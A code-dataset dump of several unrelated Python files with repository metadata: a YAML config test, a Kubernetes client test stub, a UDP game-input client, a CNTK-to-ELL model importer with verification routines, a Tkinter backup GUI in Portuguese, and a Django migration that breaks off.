def test_get_service_no():
c = YamlConfig()
c.services = {'foo': 'bar'}
with pytest.raises(UnknownServiceError):
c.get_service('baz')
def test_hosts_config():
c = YamlConfig()
c.hosts = OrderedDict((
('boo', 'app@somehost.com'),
('foo', 'app@other.com')
))
assert c.get_command_host() == 'app@somehost.com'
assert c.get_command_host('boo') == 'app@somehost.com'
assert c.get_command_host('foo') == 'app@other.com'
| 24.378486 | 139 | 0.576483 |
08fc71e38a1d22a22e5accfb0af79b6dba2d03f2 | 827 | py | Python | kubernetes/test/test_v1_job_status.py | jraby/kubernetes-client-python | e6e7b710d0b15fbde686bc9dccf00da5951bef84 | [
"Apache-2.0"
] | null | null | null | kubernetes/test/test_v1_job_status.py | jraby/kubernetes-client-python | e6e7b710d0b15fbde686bc9dccf00da5951bef84 | [
"Apache-2.0"
] | null | null | null | kubernetes/test/test_v1_job_status.py | jraby/kubernetes-client-python | e6e7b710d0b15fbde686bc9dccf00da5951bef84 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.7.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1_job_status import V1JobStatus
class TestV1JobStatus(unittest.TestCase):
""" V1JobStatus unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1JobStatus(self):
"""
Test V1JobStatus
"""
model = kubernetes.client.models.v1_job_status.V1JobStatus()
if __name__ == '__main__':
unittest.main()
| 19.232558 | 105 | 0.697703 |
844fe04c80108c09800725a81ab23f3ebc6f146c | 3,277 | py | Python | jagger/jagger/client.py | arruda/magic_it_up | 251a5cbd1fdebcea5a0150eec1367fd58b0da2d3 | [
"MIT"
] | null | null | null | jagger/jagger/client.py | arruda/magic_it_up | 251a5cbd1fdebcea5a0150eec1367fd58b0da2d3 | [
"MIT"
] | null | null | null | jagger/jagger/client.py | arruda/magic_it_up | 251a5cbd1fdebcea5a0150eec1367fd58b0da2d3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import socket
import random
import logging
import time
from constants import MSG_DATE_SEP, END_MSG, ALLOWED_KEYS
logging.basicConfig(filename='jagger_client.log', level=logging.DEBUG)
logger = logging.getLogger("jagger_client")
def check_counter_and_skip(counter, skip_cicle=(1, 3)):
"""
Check if counter is too big, if so then resets it accordingly to
a equivalent value in the skip cicle.
Then check if should ignore a this messages.
This is done by getting the mod of counter by `den`,
and then verifying if this number is lesser then `num - 1`.
But for `counter == 0` it aways returns `True`.
Ex:
>>>check_counter_and_skip(counter=0, num=2, den=3)
1, True
>>>check_counter_and_skip(counter=1, num=2, den=3)
2, True
>>>check_counter_and_skip(counter=2, num=2, den=3)
3, False
>>>check_counter_and_skip(counter=3, num=2, den=3)
4, True
>>>check_counter_and_skip(counter=4, num=2, den=3)
5, True
>>>check_counter_and_skip(counter=5, num=2, den=3)
6, False
Return a list containing:
* The new checked counter(increased by one)
* Boolean representing if has to ignore this counter or not
"""
numerator, denominator = skip_cicle
mod_counter = counter % denominator
should_skip = mod_counter < numerator
max_counter = 10000000
if counter > max_counter:
counter = mod_counter
counter += 1
return counter, should_skip
def prepare_msg(keys):
now = datetime.datetime.utcnow().isoformat()
str_keys = "".join(keys)
msg = "%s%s%s" % (now, MSG_DATE_SEP, str_keys)
return msg
def main_loop_controller(udp, dest, moves_proccessor, skip_cicle=(1, 4)):
num_resend_msgs = 0
last_keys = None
counter = 0
while True:
keys = moves_proccessor()
msg = prepare_msg(keys)
# should ignore a fragtion of the messages represented the skip cicle
# also change the counter
#counter, should_skip = check_counter_and_skip(counter, skip_cicle)
should_skip = False
if keys == last_keys:
if num_resend_msgs >= 1:
should_skip = True
else:
num_resend_msgs += 1
time.sleep(0.005)
else:
num_resend_msgs = 0
if should_skip:
#logger.debug("skipping: %s" % msg)
time.sleep(0.005)
continue
udp.sendto(msg.encode('UTF-8'), dest)
logger.debug("sent: %s" % msg)
last_keys = list(keys)
def default_moves_proccessor():
num_active_pads = random.randint(0, 2)
keys = random.sample(ALLOWED_KEYS, num_active_pads)
time.sleep(0.1)
return keys
def run(host, port=8765, moves_proccessor=default_moves_proccessor):
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
dest = (host, port)
try:
main_loop_controller(udp, dest, moves_proccessor)
except Exception as e:
logger.exception(e)
finally:
udp.sendto(END_MSG.encode('UTF-8'), dest)
udp.close()
if __name__ == '__main__':
import sys
host = sys.argv[1]
run(host)
| 29.258929 | 77 | 0.632896 |
77552639a41ff4d7c8ffa74a25a5b9b0995071f9 | 25 | py | Python | controller/__init__.py | hotpoor-for-Liwei/hj_hackathon_201607 | 7ef326a733f88e9a02961a5b467b9109e5b375b9 | [
"MIT"
] | 1 | 2021-12-21T10:42:46.000Z | 2021-12-21T10:42:46.000Z | www_local/controller/__init__.py | 2218084076/hotpoor_autoclick_xhs | a52446ba691ac19e43410a465dc63f940c0e444d | [
"Apache-2.0"
] | 1 | 2016-08-03T06:11:08.000Z | 2016-08-03T06:11:08.000Z | www_local/controller/__init__.py | 2218084076/hotpoor_autoclick_xhs | a52446ba691ac19e43410a465dc63f940c0e444d | [
"Apache-2.0"
] | 2 | 2019-11-13T06:11:25.000Z | 2020-03-13T06:19:00.000Z | # -*- encoding: utf8 -*-
| 12.5 | 24 | 0.48 |
6af8cc2b510b0b061b74b1a3b8db9e6d8ccf1c8e | 26,910 | py | Python | tools/importers/CNTK/cntk_to_ell.py | n-gineer/ELL | 2e5b93fe13993073a9486fc8720359ae4a49f737 | [
"MIT"
] | 2,094 | 2016-09-28T05:55:24.000Z | 2019-05-04T19:06:36.000Z | tools/importers/CNTK/cntk_to_ell.py | n-gineer/ELL | 2e5b93fe13993073a9486fc8720359ae4a49f737 | [
"MIT"
] | 213 | 2017-06-30T12:53:40.000Z | 2019-05-03T06:35:38.000Z | tools/importers/CNTK/cntk_to_ell.py | n-gineer/ELL | 2e5b93fe13993073a9486fc8720359ae4a49f737 | [
"MIT"
] | 301 | 2017-03-24T08:40:00.000Z | 2019-05-02T21:22:28.000Z | ####################################################################################################
#
# Project: Embedded Learning Library (ELL)
# File: cntk_to_ell.py (importers)
# Authors: Byron Changuion
#
# Requires: Python 3.x, cntk-2.4
#
####################################################################################################
import sys
import os
import math
import time
import numpy as np
from cntk import load_model
from cntk.ops import softmax
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'lib'))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../common'))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../utilities/pythonlibs'))
import find_ell # noqa 401
import ell
import logger
from cntk_converters import *
import cntk_layers as cntk_layers
import cntk_utilities as cntk_utilities
import common.importer
import common.memory_shapes as memory_shapes
#
# Mapping of CNTK operation type to the converter object to use.
# For each entry:
# key - the name of the CNTK operation (the op_name of the node)
# value - converter class to use, or,
# tuple(converter_class, weight_mapping, operation_type)
# When a tuple is used, the convert class is initialized with:
# converter_type(weight_mapping, operation_type)
# or,
# converter_type(weight_mapping)
# if operation_type is missing.
# e.g.
# cntk_converter_map =
# {
# "Activation" = CntkStandardConverter
# "AveragePooling" = CntkPoolingConverter
# "BatchNormalization" = (CntkStandardConverter,{"mean": 3, "variance": 4, "count": 5, "scale": 0, "bias": 1})
# ...
# }
# For "Activation":
# - the CntkStandardConverter will be used to create an ImporterNode with
# operation_type "Activation"
# - standard inputs, outputs, input/output shapes etc. derived from CNTK node
# inputs/outputs.
# For "AveragePooling":
# - the CntkPoolingConverter class will be used to create the corresponding ImporterNode
# For "BatchNormalization":
# - the CntkStandardConverter will create an ImporterNode with
# operation_type "BatchNormalization"
# - standard inputs, outputs, input/output shapes etc. derived from CNTK node
# inputs/outputs.
# - Weights will be retrieved from the inputs, with "mean" coming from index 3,
# "variance from index 4" etc.
#
cntk_converter_map = {
"Activation": CntkStandardConverter,
"AveragePooling": CntkPoolingConverter,
"BatchNormalization": (CntkStandardConverter, {"mean": (2, "aggregate_mean", "channel"),
"variance": (3, "aggregate_variance", "channel"),
"count": (4, "aggregate_count", "channel"),
"scale": (0, "scale", "channel"),
"bias": (1, "bias", "channel")}),
"ClassificationError": (CntkStandardConverter, {}, "Skip"),
"Combine": (CntkStandardConverter, {}, "Skip"),
"Convolution": CntkConvolutionConverter,
"CrossEntropyWithSoftmax": CntkCrossEntropyWithSoftmaxConverter,
"Dense": CntkDenseConverter,
"Dropout": (CntkStandardConverter, {}, "Passthrough"),
"ElementTimes": CntkElementTimesConverter,
"Input": CntkInputConverter,
"linear": CntkDenseConverter,
"MaxPooling": CntkPoolingConverter,
"Minus": (CntkStandardConverter, {"bias": (1, "channel")}),
"Plus": CntkPlusConverter,
"PReLU": (CntkStandardConverter, {"alpha": (0, "prelu", "channel_row_column")}, "PReLU"),
"ReduceElements": (CntkStandardConverter, {}, "Skip"),
"ReLU": (CntkStandardConverter, {}, "ReLU"),
"Reshape": CntkReshapeConverter,
"Softmax": CntkStandardConverter,
"Splice": CntkSpliceConverter,
"UserFunction": CntkUserFunctionConverter,
}
def import_nodes(cntk_nodes):
"""
Returns a common.importer.Model from CNTK nodes.
"""
importer_model = common.importer.ImporterModel()
for cntk_node in cntk_nodes:
node = CntkConverterFactory.get_converter(cntk_node, cntk_converter_map)
if node:
importer_model.add_node(node.uid, node.convert())
for w in node.weights:
weight = node.weights[w]
importer_model.add_tensor(weight[0], weight[1], weight[2])
return importer_model
def predictor_from_cntk_model(modelFile, plotModel=False):
"""Loads a CNTK model and returns an ell.neural.NeuralNetworkPredictor"""
_logger = logger.get()
_logger.info("Loading...")
z = load_model(modelFile)
_logger.info("\nFinished loading.")
if plotModel:
filename = os.path.join(os.path.dirname(modelFile), os.path.basename(modelFile) + ".svg")
cntk_utilities.plot_model(z, filename)
_logger.info("Pre-processing...")
modelLayers = cntk_utilities.get_model_layers(z)
# Get the relevant CNTK layers that we will convert to ELL
layersToConvert = cntk_layers.get_filtered_layers_list(modelLayers)
_logger.info("\nFinished pre-processing.")
predictor = None
try:
# Create a list of ELL layers from the CNTK layers
ellLayers = cntk_layers.convert_cntk_layers_to_ell_layers(
layersToConvert)
# Create an ELL neural network predictor from the layers
predictor = ell.neural.NeuralNetworkPredictor(ellLayers)
except BaseException as exception:
_logger.error("Error occurred attempting to convert cntk layers to ELL layers: " + str(exception))
raise exception
return predictor
def predictor_from_cntk_model_using_new_engine(modelFile, plotModel=True):
"""
Loads a CNTK model and returns an ell.neural.NeuralNetworkPredictor
"""
_logger = logger.get()
_logger.info("Loading...")
z = load_model(modelFile)
_logger.info("\nFinished loading.")
if plotModel:
filename = os.path.join(os.path.dirname(modelFile), os.path.basename(modelFile) + ".svg")
cntk_utilities.plot_model(z, filename)
try:
_logger.info("Pre-processing...")
# Get the relevant nodes from CNTK that make up the model
importer_nodes = cntk_utilities.Utilities.get_model_nodes(z)
_logger.info("\nFinished pre-processing.")
# Create an ImporterModel from the CNTK nodes
importer_model = import_nodes(importer_nodes)
# Use the common importer engine to drive conversion of the
# ImporterModel to ELL layers
importer_engine = common.importer.ImporterEngine()
ell_layers = importer_engine.convert(importer_model)
# Create an ELL neural network predictor from the layers
predictor = ell.neural.NeuralNetworkPredictor(ell_layers)
except BaseException as exception:
_logger.error("Error occurred attempting to convert cntk layers to ELL layers: " + str(exception))
raise exception
return predictor
def get_node_output_in_ell_order(cntk_node_results):
ordered_weights = cntk_node_results
original_shape = ordered_weights.shape
if len(original_shape) == 4:
ordered_weights = ordered_weights.reshape(original_shape[0] * original_shape[1],
original_shape[2], original_shape[3])
original_shape = ordered_weights.shape
if len(original_shape) == 3:
ordered_weights = np.moveaxis(ordered_weights, 0, -1)
ordered_weights = ordered_weights.ravel().astype(np.float).reshape(
original_shape[1], original_shape[2], original_shape[0])
elif len(original_shape) == 2:
ordered_weights = np.moveaxis(ordered_weights, 0, -1)
ordered_weights = ordered_weights.ravel().astype(
np.float).reshape(original_shape[1], 1, original_shape[0])
elif len(original_shape) == 1:
ordered_weights = ordered_weights.ravel().astype(
np.float).reshape(1, 1, cntk_node_results.size)
else:
raise NotImplementedError(
"Unsupported tensor dimensions {}".format(len(original_shape)))
return ordered_weights
def print_comparison(tensorA, tensorB):
pass
for row in range(tensorA.shape[0]):
for column in range(tensorA.shape[1]):
for channel in range(tensorA.shape[2]):
if math.fabs(tensorA[row, column, channel] - tensorB[row, column, channel]) > 0.0001:
print("A[{},{},{}] = {}".format(row, column, channel, tensorA[row, column, channel]))
print("B[{},{},{}] = {}".format(row, column, channel, tensorB[row, column, channel]))
def verify_ell_nodes_in_vision_model(ell_map, cntk_model, cntk_nodes, ordered_importer_nodes, node_mapping,
testing_info):
_logger = logger.get()
_logger.info("\n\nVerification of model nodes starting")
cntk_node_results = None
try:
# Get input to the CNTK model
cntk_input_tensor = np.random.random((cntk_model.arguments[0].shape)).astype(np.float32) * 255
ell_input_tensor = cntk_input_tensor
if len(cntk_model.arguments[0].shape) == 1:
ell_input_tensor = cntk_input_tensor.reshape((1, 1, cntk_model.arguments[0].shape[0]))
ell_input_tensor = memory_shapes.get_tensor_in_ell_order(ell_input_tensor, "channel_row_column")
ell_input_tensor = ell_input_tensor.ravel().astype(np.float32)
# For convenient lookup, map from the cntk intermediate node to the
# importer node
cntk_nodes_map = {}
for cntk_node in cntk_nodes:
cntk_nodes_map[cntk_node.uid] = cntk_node
# Feed input to the ELL model
_logger.info("Getting computed ELL results")
ell_map.Compute(ell_input_tensor)
# Walk list of importer nodes
for importer_node in ordered_importer_nodes:
if importer_node.operation_type in ["Input", "Passthrough", "Reshape", "Skip", "Softmax"]:
if importer_node.operation_type == "Softmax":
testing_info["apply_softmax"] = True
continue
_logger.info("Looking at node: {}".format(importer_node))
# Get the CNTK output values
cntk_node = cntk_nodes_map[importer_node.id]
try:
if cntk_node.op_name != "UserFunction":
clone = cntk_node.clone(CloneMethod.clone)
except BaseException:
_logger.info("Couldn't clone {}, skipping".format(cntk_node.uid))
continue
# Get output from CNTK model
_logger.info("Getting CNTK results")
if (len(clone.arguments) > 1):
arg1_output = np.zeros(clone.arguments[1].shape).astype(np.float32)
cntk_node_results = clone.eval({clone.arguments[0]: [cntk_input_tensor],
clone.arguments[1]: arg1_output})
else:
cntk_node_results = clone.eval({clone.arguments[0]: [cntk_input_tensor]})
# Reorder cntk node output
cntk_node_results = get_node_output_in_ell_order(cntk_node_results)
# Get the results from the last ELL node for that group
ell_node = node_mapping[importer_node.id][-1]
ell_node_output_port = ell_node.GetOutputPort("output")
ell_node_results = np.zeros((ell_node_output_port.Size(),), dtype=np.float32)
for i in range(ell_node_output_port.Size()):
ell_node_results[i] = ell_node_output_port.GetDoubleOutput(i)
output_shape = cntk_node_results.shape
if (len(output_shape) == 3):
padding = importer_node.output_padding["size"]
output_shape_with_padding = (output_shape[0] + 2 * padding,
output_shape[1] + 2 * padding,
output_shape[2])
ell_node_results = ell_node_results.reshape(output_shape_with_padding)
# Remove padding and look at active region only
ell_node_results = ell_node_results[padding:output_shape[0] + padding,
padding:output_shape[1] + padding, :]
# Compare results. Some layers have large numbers (e.g > 500.734) and some small numbers
# (e.g. 0.0038453). To make the comparison more resilient and meaningful for large numbers,
# normalize before comparing, since comparison is being done on significant digits.
max = cntk_node_results.max()
if max > 100:
cntk_node_results = cntk_node_results / max
ell_node_results = ell_node_results / max
np.testing.assert_allclose(
cntk_node_results, ell_node_results, rtol=1e-04, atol=1e-04, err_msg=(
'results for compiled ELL model do not match CNTK output!'))
_logger.info("Output for {} verified\n".format(importer_node.id))
except BaseException as exception:
_logger.error("Verification of model output failed")
# if cntk_node_results is not None:
# print_comparison(cntk_node_results, ell_node_results)
raise exception
_logger.info("Verification of model nodes complete\n")
def get_output_from_cntk_model(cntk_model, cntk_input_tensor, testing_info):
# Get output from CNTK model
_logger = logger.get()
_logger.info("Getting CNTK results")
if (len(cntk_model.arguments) > 1):
arg1_output = np.zeros(cntk_model.arguments[1].shape).astype(np.float32)
cntk_output = cntk_model.eval({cntk_model.arguments[0]: [cntk_input_tensor],
cntk_model.arguments[1]: arg1_output})
else:
cntk_output = cntk_model.eval({cntk_model.arguments[0]: [cntk_input_tensor]})
size = 0
if isinstance(cntk_output, dict):
for key in cntk_model.outputs:
shape = key.shape
if len(shape) > 0:
s = np.max(shape)
if (s > size):
size = s
cntk_output = cntk_output[key][0]
else:
cntk_output = cntk_output[0]
# Check whether softmax needs to be applied or not.
if testing_info["apply_softmax"]:
cntk_output = softmax(cntk_output).eval()
# Reorder cntk node output
cntk_output = get_node_output_in_ell_order(cntk_output)
return cntk_output
def verify_ell_output_in_vision_model(ell_map, cntk_model, testing_info):
_logger = logger.get()
_logger.info("Verification of model output starting")
try:
cntk_input_tensor = np.random.random((cntk_model.arguments[0].shape)).astype(np.float32) * 255
ell_input_tensor = memory_shapes.get_tensor_in_ell_order(cntk_input_tensor, "channel_row_column")
ell_input_tensor = ell_input_tensor.ravel().astype(np.float32)
# Get output from CNTK model
cntk_output = get_output_from_cntk_model(cntk_model, cntk_input_tensor, testing_info)
# Get computed ELL result
_logger.info("Getting computed ELL results")
result_from_compute = np.array(ell_map.Compute(ell_input_tensor))
# Get compiled ELL result
_logger.info("Getting compiled ELL results")
compiler_options = ell.model.MapCompilerOptions()
compiler_options.useBlas = True
compiled_ell_map = ell_map.Compile("host", "model", "predict", compilerOptions=compiler_options)
result_from_compiled = np.array(compiled_ell_map.Compute(ell_input_tensor))
# Verify the computed result against the cntk result
np.testing.assert_array_almost_equal(
cntk_output, result_from_compute, decimal=4,
err_msg=('results for computed ELL model do not match CNTK output!'))
_logger.info("Verified computed result against CNTK")
# Verify the compiled result against the cntk result
np.testing.assert_array_almost_equal(
cntk_output, result_from_compiled, decimal=4, err_msg=(
'results for compiled ELL model do not match CNTK output!'))
_logger.info("Verified compiled result against CNTK")
# Verify the compiled result agrees with the computed result
np.testing.assert_array_almost_equal(
result_from_compute, result_from_compiled, decimal=4, err_msg=(
'results for computed ELL model do not match results from compiled ELL model!'))
_logger.info("Verified compiled result against computed result")
# Get timing info
total_time = 0
num_frames = 50
_logger.info("Sending {} frames through model...".format(num_frames))
for i in range(num_frames):
cntk_input_tensor = np.random.random((cntk_model.arguments[0].shape)).astype(np.float32) * 255
ell_input_tensor = memory_shapes.get_tensor_in_ell_order(cntk_input_tensor, "channel_row_column")
ell_input_tensor = ell_input_tensor.ravel().astype(np.float32)
start = time.time()
result_from_compiled = np.array(compiled_ell_map.Compute(ell_input_tensor, dtype=np.float32))
end = time.time()
total_time += end - start
total_time /= num_frames
_logger.info("Average speed: {:.0f}ms/frame".format(total_time * 1000))
except BaseException as exception:
_logger.error("Verification of model output failed")
raise exception
_logger.info("Verification of model output complete")
def verify_compiled_ell_nodes_in_vision_model(modelFile, cntk_model, model_cntk_nodes, ordered_importer_nodes,
step_interval_msec=None, lag_threshold_msec=None, plot_model=False,
verify_model={"audio": False, "vision": False}):
_logger = logger.get()
# For convenient lookup, map from the cntk intermediate node to the
# importer node
cntk_nodes_map = {}
for cntk_node in model_cntk_nodes:
cntk_nodes_map[cntk_node.uid] = cntk_node
cntk_input_tensor = np.random.random((cntk_model.arguments[0].shape)).astype(np.float32) * 255
ell_input_tensor = cntk_input_tensor
if len(cntk_model.arguments[0].shape) == 1:
ell_input_tensor = cntk_input_tensor.reshape((1, 1, cntk_model.arguments[0].shape[0]))
ell_input_tensor = memory_shapes.get_tensor_in_ell_order(ell_input_tensor, "channel_row_column")
ell_input_tensor = ell_input_tensor.ravel().astype(np.float32)
cntk_nodes = [cntk_nodes_map[ordered_importer_nodes[0].id]]
for i in range(1, len(ordered_importer_nodes)):
cntk_node = cntk_nodes_map[ordered_importer_nodes[i].id]
cntk_nodes.append(cntk_node)
try:
_logger.info("---- Testing compiled ELL nodes using prefix of {} CNTK nodes ----".format(i + 1))
_logger.info("Last CNTK node in chain: {}".format(cntk_nodes[i].uid))
# Create an ImporterModel from the CNTK nodes
importer_model = import_nodes(cntk_nodes)
if len(importer_model.nodes) > 0:
# Use the common importer engine to drive conversion of the
# ImporterModel to ELL layers
importer_engine = common.importer.ImporterEngine(step_interval_msec=step_interval_msec,
lag_threshold_msec=lag_threshold_msec)
ell_map = importer_engine.convert_nodes(importer_model)
prefix_ordered_importer_nodes, _ = importer_engine.get_importer_node_to_ell_mapping()
if prefix_ordered_importer_nodes[-1].id != ordered_importer_nodes[i].id:
_logger.info("Skipping..., can't test output of node {} yet".format(ordered_importer_nodes[i].id))
continue
else:
_logger.info("Skipping...")
continue
# Feed input to the ELL model
_logger.info("Getting computed ELL results")
ell_map.Compute(ell_input_tensor)
model_clone = None
if cntk_node.op_name != "UserFunction":
model_clone = cntk_node.clone(CloneMethod.clone)
if not model_clone:
print("Skipping...")
continue
if verify_model["audio"]:
_logger.info("Verification of audio models is not supported at this time, skipping verification")
elif verify_model["vision"]:
testing_info = {"apply_softmax": False}
try:
# Get output from CNTK model
cntk_output = get_output_from_cntk_model(model_clone, cntk_input_tensor, testing_info)
# Get compiled ELL result
_logger.info("Getting compiled ELL results")
compiler_options = ell.model.MapCompilerOptions()
compiler_options.useBlas = True
compiled_ell_map = ell_map.Compile("host", "model", "predict", compilerOptions=compiler_options)
result_from_compiled = np.array(compiled_ell_map.Compute(ell_input_tensor))
output_shape = cntk_output.shape
if (len(output_shape) == 3):
if cntk_output.size == result_from_compiled.size:
result_from_compiled = result_from_compiled.reshape(output_shape)
else:
padding = ordered_importer_nodes[i].output_padding["size"]
output_shape_with_padding = (output_shape[0] + 2 * padding,
output_shape[1] + 2 * padding,
output_shape[2])
result_from_compiled = result_from_compiled.reshape(output_shape_with_padding)
# Remove padding and look at active region only
result_from_compiled = result_from_compiled[padding:output_shape[0] + padding,
padding:output_shape[1] + padding, :]
# Put the ELL results into same order as CNTK
# if prefix_ordered_importer_nodes[-1].output_shapes[0][1] == "channel_row_column":
print(result_from_compiled.shape, cntk_output.shape)
# result_from_compiled = memory_shapes.get_tensor_in_ell_order(result_from_compiled, "xyz")
# print(result_from_compiled)
# print(cntk_output)
# Compare results. Some layers have large numbers (e.g > 500.734) and some small numbers
# (e.g. 0.0038453). To make the comparison more resilient and meaningful for large numbers,
# normalize before comparing, since comparison is being done on significant digits.
max = cntk_output.max()
if max > 100:
cntk_output = cntk_output / max
result_from_compiled = result_from_compiled / max
# Verify the compiled result against the cntk result
np.testing.assert_array_almost_equal(
cntk_output, result_from_compiled, decimal=4, err_msg=(
'results for compiled ELL nodes do not match CNTK output!'))
_logger.info("---- passed ----")
_logger.info("")
except BaseException as exception:
_logger.error("Error occurred verifying compiled ELL nodes of imported model")
basename, ext = os.path.splitext(modelFile)
ell_map.Save(basename + ".ell.compiled_node_verification_failed")
raise exception
except BaseException as exception:
_logger.error("Error occurred attempting to convert cntk layers to ELL model: " + str(exception))
raise exception
def map_from_cntk_model_using_new_engine(modelFile, step_interval_msec=None, lag_threshold_msec=None, plot_model=False,
verify_model={"audio": False, "vision": False}):
"""
Loads a CNTK model and returns an ell.model.Map
"""
_logger = logger.get()
_logger.info("Loading...")
cntk_model = load_model(modelFile)
_logger.info("\nFinished loading.")
if plot_model:
filename = os.path.join(os.path.dirname(modelFile), os.path.basename(modelFile) + ".svg")
cntk_utilities.plot_model(cntk_model, filename)
try:
_logger.info("Pre-processing...")
# Get the relevant nodes from CNTK that make up the model
cntk_nodes = cntk_utilities.Utilities.get_model_nodes(cntk_model)
_logger.info("\nFinished pre-processing.")
# Create an ImporterModel from the CNTK nodes
importer_model = import_nodes(cntk_nodes)
# Use the common importer engine to drive conversion of the
# ImporterModel to ELL layers
importer_engine = common.importer.ImporterEngine(step_interval_msec=step_interval_msec,
lag_threshold_msec=lag_threshold_msec)
ell_map = importer_engine.convert_nodes(importer_model)
except BaseException as exception:
_logger.error("Error occurred attempting to convert cntk layers to ELL model: " + str(exception))
raise exception
if verify_model["audio"]:
_logger.info("Verification of audio models is not supported at this time, skipping verification")
elif verify_model["vision"]:
testing_info = {"apply_softmax": False}
try:
ordered_importer_nodes, node_mapping = importer_engine.get_importer_node_to_ell_mapping()
# RESTORE:
# verify_ell_nodes_in_vision_model(ell_map, cntk_model, cntk_nodes, ordered_importer_nodes, node_mapping,
# testing_info)
verify_compiled_ell_nodes_in_vision_model(modelFile, cntk_model, cntk_nodes, ordered_importer_nodes,
verify_model=verify_model)
verify_ell_output_in_vision_model(ell_map, cntk_model, testing_info)
except BaseException as exception:
_logger.error("Error occurred verifying imported model")
basename, ext = os.path.splitext(modelFile)
ell_map.Save(basename + ".ell.verification_failed")
raise exception
return ell_map
| 46.881533 | 119 | 0.634262 |
54d76c5c3aee421d915ca9ca85c36ac4c92909e8 | 3,137 | py | Python | Outros/Advanced Backup v.0.1 alpha/Application/interface.py | paulovrn12/Aprendizados | fab59169e81d3f86709206dccbee69a69cf29964 | [
"MIT"
] | null | null | null | Outros/Advanced Backup v.0.1 alpha/Application/interface.py | paulovrn12/Aprendizados | fab59169e81d3f86709206dccbee69a69cf29964 | [
"MIT"
] | null | null | null | Outros/Advanced Backup v.0.1 alpha/Application/interface.py | paulovrn12/Aprendizados | fab59169e81d3f86709206dccbee69a69cf29964 | [
"MIT"
] | null | null | null | # IMPORTAÇÕES
from tkinter import *
import robocopy as rc
def TelaInicio():
# VARIÁVEIS ÚTEIS
icon_dir = r'Scripts\Advanced Backup v.0.1 alpha\Application\data\icon\adv.ico'
# GUI
tela = Tk()
tela.title('Início - Advanced Backup v.0.1 alpha')
CentroMonitor(tela, 400, 180)
tela.iconbitmap(icon_dir)
tela.resizable(False, False)
# WIDGETS
orient_tx = Label(tela, text='Selecione abaixo a opção de Backup desejada!', width=53)
copy_paste_bt = Button(tela, text='Copiar e Colar\n(Simples)')
robocopy_bt = Button(tela, text='Backup Robocopy\n(Avançado)', command=TelaRobocopy)
cloud_bt = Button(tela, text='Backup Externo\n(Cloud / Nuvem)')
github_bt = Button(tela, text='Backup de Código\n(Git / GitHub)')
# LAYOUTS
orient_tx.grid(sticky='we', columnspan=2, padx=10, pady=10)
copy_paste_bt.grid(sticky='we', row=1, column=0, padx=10, pady=10)
robocopy_bt.grid(sticky='we', row=1, column=1, padx=10, pady=10)
cloud_bt.grid(sticky='we', row=2, column=0, padx=10, pady=10)
github_bt.grid(sticky='we', row=2, column=1, padx=10, pady=10)
# END GUI
tela.mainloop()
def TelaRobocopy(ultimo_backup='Sem histórico!'):
# FUNÇÕES ÚTEIS
def CorDiretorio(label):
if ultimo_backup == 'Sem histórico!':
label['fg'] = '#ff0000'
return label['fg']
else:
label['fg'] = '#00ff00'
return label['fg']
#def BotaoRepetirBackup():
# if ultimo_backup == 'Sem histórico!':
#
# return
# else:
#
# return
# VARIÁVEIS ÚTEIS
icone_dir = r'Scripts\Advanced Backup v.0.1 alpha\Application\data\icon\adv.ico'
# GUI
tela = Tk()
tela.title('Robocopy - Advanced Backup v.0.1 alpha')
CentroMonitor(tela, 400, 180)
tela.iconbitmap(icone_dir)
tela.resizable(False, False)
# WIDGETS
texto_opcao = Label(tela, text='Você selecionou a opção Backup Robocopy')
texto_ajuda = Label(tela, text='Nessa opção é possível realizar um backup dos seus arquivos com o\ndetalhamento completo de tudo o que foi feito no processo.', justify=LEFT)
texto_historico = Label(tela, text=f'Ultimo backup:', justify=LEFT)
texto_diretorio = Label(tela, text=f'{ultimo_backup}', justify=LEFT, anchor=W, fg='#000000')
CorDiretorio(texto_diretorio)
botao_rep_backup = Button(tela, text='Repetir os diretórios do\nultimo backup realizado', justify=CENTER, width=22)
botao_selec_dir = Button(tela, text='Selecionar diretórios de orígem\ne destino do seu backup', justify=CENTER)
# LAYOUTS
texto_opcao.grid(row=0, column=0, columnspan=4, sticky='we', padx=10, pady=10)
texto_ajuda.grid(row=1, column=0, rowspan=2, columnspan=4, sticky=W, padx=10)
texto_historico.grid(row=3, column=0, columnspan=3, sticky=W, padx=10)
texto_diretorio.grid(row=3, column=1, sticky=E, padx=10)
botao_rep_backup.grid(row=4, column=0, rowspan=2, columnspan=4, sticky=W,padx=10, pady=10)
botao_selec_dir.grid(row=4, column=2, rowspan=2, columnspan=4, sticky=E,padx=10, pady=10)
# END GUI
tela.mainloop()
| 41.826667 | 177 | 0.669748 |
f82da76e6a951eb3963c0e9ec99ce38bb451cb03 | 5,115 | py | Python | onlinecourse/migrations/0001_initial.py | jtihomirovs/final-cloud-app-with-database | b850cf743c98dceac77abdc43de40df40c52bb0c | [
"Apache-2.0"
] | null | null | null | onlinecourse/migrations/0001_initial.py | jtihomirovs/final-cloud-app-with-database | b850cf743c98dceac77abdc43de40df40c52bb0c | [
"Apache-2.0"
] | null | null | null | onlinecourse/migrations/0001_initial.py | jtihomirovs/final-cloud-app-with-database | b850cf743c98dceac77abdc43de40df40c52bb0c | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.1.3 on 2022-01-13 10:39
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Choice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choice_text', models.TextField()),
('is_choice_correct', models.BooleanField()),
],
),
migrations.CreateModel(
name='Course',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(default='online course', max_length=30)),
